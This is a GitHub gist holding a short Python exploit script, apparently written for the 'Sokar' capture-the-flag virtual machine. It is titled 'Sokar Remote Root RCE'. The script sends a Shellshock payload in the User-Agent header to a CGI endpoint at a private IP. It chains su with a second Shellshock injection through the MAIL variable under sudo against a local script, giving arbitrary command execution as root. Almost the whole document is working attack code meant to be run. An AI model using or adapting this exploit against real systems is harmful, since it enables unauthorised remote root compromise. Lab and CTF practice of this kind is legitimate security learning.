Skip to content

Instantly share code, notes, and snippets.

@leonjza
Last active August 29, 2015 14:15
Show Gist options
  • Save leonjza/4bd3f4de7e9c2105c2ca to your computer and use it in GitHub Desktop.
Save leonjza/4bd3f4de7e9c2105c2ca to your computer and use it in GitHub Desktop.
Sokar Remote Root RCE
#!/usr/bin/python
# 2015 Leon Jacobs
# sokar remote root command execution
import requests
import sys
if len(sys.argv) < 2:
print " * Usage %s <cmd>" % sys.argv[0]
sys.exit(1)
# Grab the command from the args
command = sys.argv[1].strip()
# prep to shock the lime script
root_command = """echo "N" | sudo MAIL=\\"() { :;}; %s;\\" /home/bynarr/lime""" % command
# prep to exec the command as bynarr
payload = """/usr/bin/python -c "import time; time.sleep(1); print 'fruity'" | /usr/bin/python -c "import pty; pty.spawn(['/bin/su','-c','%s', 'bynarr']);" """ % root_command
# be verbose about the full command
print " * Executing %s\n" % payload
# Send the sploit
headers = { "User-Agent": "() { :;};echo;%s" % payload }
print requests.get("http://192.168.217.163:591/cgi-bin/cat", headers=headers).text.strip()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment